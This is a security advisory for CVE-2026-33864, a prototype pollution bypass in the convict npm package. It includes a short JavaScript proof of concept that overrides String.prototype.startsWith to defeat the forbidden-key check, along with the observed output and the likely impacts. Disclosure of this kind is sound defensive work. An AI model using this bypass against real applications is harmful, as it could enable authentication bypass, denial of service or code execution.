CVE-2026-33864

Convict has Prototype Pollution via startsWith() function

發布日:2026/3/26修改日:2026/3/26

描述

### Summary A prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute `Object.prototype` via a crafted input using `String.prototype`. ### Details The vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where `startsWith()` function is used to check whether user provided input contain forbidden strings. ### PoC #### Steps to reproduce 1. Install latest version of convict using `npm install` or cloning from git 2. Run the following code snippet: ```javascript String.prototype.startsWith = () => false; const convict = require('convict'); let obj = {}; const config = convict(obj); console.log({}.polluted); config.set('constructor.prototype.polluted', 'yes'); console.log({}.polluted); // prints yes -> the patch is bypassed and prototype pollution occurred ``` #### Expected behavior Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console: ``` undefined undefined OR throw an Error ``` #### Actual behavior `Object.prototype` is polluted This is printed on the console: ``` undefined yes ``` ### Impact This is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using `convict.set` may be affected. It could potentially lead to the following problems: 1. Authentication bypass 2. Denial of service 3. Remote code execution (if polluted property is passed to sinks like eval or child_process)

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來源版本嚴重程度向量
osvCVSS 4.0CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

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